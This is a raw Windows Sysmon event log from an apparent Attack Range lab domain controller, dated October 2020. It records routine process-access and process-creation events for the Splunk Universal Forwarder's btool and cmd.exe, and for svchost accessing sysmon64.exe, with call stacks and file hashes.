--no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3E0A-5F80-4100-000000007F01}3976C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000001726Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0A-5F80-4100-000000007F01}3976C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001725Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001724Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001723Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001722Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001721Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001720Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001719Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001718Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001717Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001716Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-4100-000000007F01}3976C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001715Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3E0A-5F80-4000-000000007F01}39643968C:\Windows\system32\cmd.exe{733EE690-3E0A-5F80-4100-000000007F01}3976C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001714Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.826{733EE690-3E0A-5F80-4100-000000007F01}3976C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{733EE690-3E0A-5F80-4000-000000007F01}3964C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000001713Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0A-5F80-4000-000000007F01}3964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001712Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001711Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001710Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001709Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001708Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001707Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001706Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001705Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001704Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-4000-000000007F01}3964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001703Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001702Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3E0A-5F80-3F00-000000007F01}39443948C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{733EE690-3E0A-5F80-4000-000000007F01}3964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001701Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.819{733EE690-3E0A-5F80-4000-000000007F01}3964C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E0A-5F80-3F00-000000007F01}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001700Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0A-5F80-3F00-000000007F01}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001699Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 